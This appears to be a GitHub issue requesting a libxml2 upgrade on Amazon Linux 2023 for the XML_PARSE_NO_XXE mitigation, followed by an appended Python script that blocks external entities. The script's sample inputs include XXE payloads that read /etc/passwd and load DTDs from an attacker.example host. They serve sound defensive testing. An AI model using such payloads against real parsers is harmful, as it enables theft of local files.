
[Package Request] - libxml2 2.13.x or newer (latest is 2.15.2) #1076

@MaxEliaserAWS

Description

What package is missing from Amazon Linux 2023? Please describe and include package name.

libxml2 version 2.13.0 or newer

Is this an update to existing package or new package request?

An update. Current version in AL2023 is 2.10.4.

Is this package available in Amazon Linux 2? If it is available via external sources such as EPEL, please specify.

AL2 has an even older version, 2.9.1. RHEL/Fedora appear not to have packaged anything newer than 2.12.x. I downloaded the latest Fedora Rawhide RPM and confirmed that it does not have a backport of the feature I wanted to use.

Any additional information you'd like to include. (use-cases, etc)

From libxml 2.13.0 onward, the enum xmlParserOption includes the option XML_PARSE_NO_XXE, which is an important security mitigation when handling untrusted XML. It disables all external entity/DTD loading, which can protect against XML injection attacks to exfiltrate local files.

Ideally though, we'd just go up to the latest libxml 2.15.2, which fixes additional CVEs vs libxml 2.13.0.
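As an added example (not code from the issue, from Amazon Linux, or from libxml2), the policy that XML_PARSE_NO_XXE enforces is reproduced here with Python's standard-library expat bindings, so it runs on a host whose libxml2 predates 2.13: any external DTD subset or any external general/parameter entity declaration aborts the parse before the parser performs file or network I/O, while internal entities still expand. The sample documents, the `attacker.example` host and the function names are constructed for this illustration.

```python
"""Refuse XML that would load anything external, before any I/O happens.

Constructed example mirroring the intent of libxml2's XML_PARSE_NO_XXE
(2.13+) with Python's stdlib expat bindings. This is not libxml2 code.
"""
import xml.parsers.expat as expat


class ExternalEntityRejected(Exception):
    """Raised when a document declares or references an external resource."""


def parse_no_xxe(data):
    """Parse `data` (bytes) and return the element names in document order.

    An external DTD subset, an external general or parameter entity
    declaration, or an external entity reference raises
    ExternalEntityRejected. Internal entities (<!ENTITY x "text">) are
    still expanded, matching what XML_PARSE_NO_XXE leaves enabled.
    """
    parser = expat.ParserCreate()
    seen = []

    def on_doctype(name, system_id, public_id, has_internal_subset):
        # <!DOCTYPE r SYSTEM "http://..."> would make a parser fetch the DTD.
        if system_id is not None or public_id is not None:
            raise ExternalEntityRejected(
                "external DTD subset for <!DOCTYPE %s>" % name)

    def on_entity_decl(name, is_param, value, base, system_id,
                       public_id, notation):
        # expat passes value=None exactly for SYSTEM/PUBLIC (external) entities.
        if value is None:
            kind = "parameter" if is_param else "general"
            raise ExternalEntityRejected(
                "external %s entity %r -> %r" % (kind, name, system_id))

    def on_external_ref(context, base, system_id, public_id):
        # Defence in depth: refuse any reference expat still tries to resolve.
        raise ExternalEntityRejected(
            "external entity reference -> %r" % (system_id,))

    parser.StartDoctypeDeclHandler = on_doctype
    parser.EntityDeclHandler = on_entity_decl
    parser.ExternalEntityRefHandler = on_external_ref
    parser.StartElementHandler = lambda name, attrs: seen.append(name)
    parser.Parse(data, True)
    return seen


def check(data):
    """Return ("accepted", "") or ("rejected", reason) for one document."""
    try:
        parse_no_xxe(data)
        return "accepted", ""
    except ExternalEntityRejected as exc:
        return "rejected", str(exc)


# Constructed inputs for the demonstration; none come from the issue.
SAMPLES = {
    "plain": b"<root><a/><b/></root>",
    "internal_entity": b'<!DOCTYPE r [<!ENTITY greet "hello">]><r>&greet;</r>',
    "xxe_file": b'<!DOCTYPE r [<!ENTITY xxe SYSTEM "file:///etc/passwd">]>'
                b"<r>&xxe;</r>",
    "external_dtd": b'<!DOCTYPE r SYSTEM "http://attacker.example/evil.dtd"><r/>',
    "param_entity": b'<!DOCTYPE r [<!ENTITY % ext SYSTEM '
                    b'"http://attacker.example/e.dtd"> %ext;]><r/>',
}

if __name__ == "__main__":
    for label, doc in SAMPLES.items():
        verdict, why = check(doc)
        print("%-16s %-8s %s" % (label, verdict, why))
```

The classic file-read payload, an external DOCTYPE and an external parameter entity are all rejected at declaration time, so no `file:///` or `http://` resolution is ever attempted; the two benign documents parse normally. On a libxml2 2.13+ host the same effect comes from passing XML_PARSE_NO_XXE in the options argument of the xmlRead*/xmlCtxtRead* functions.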
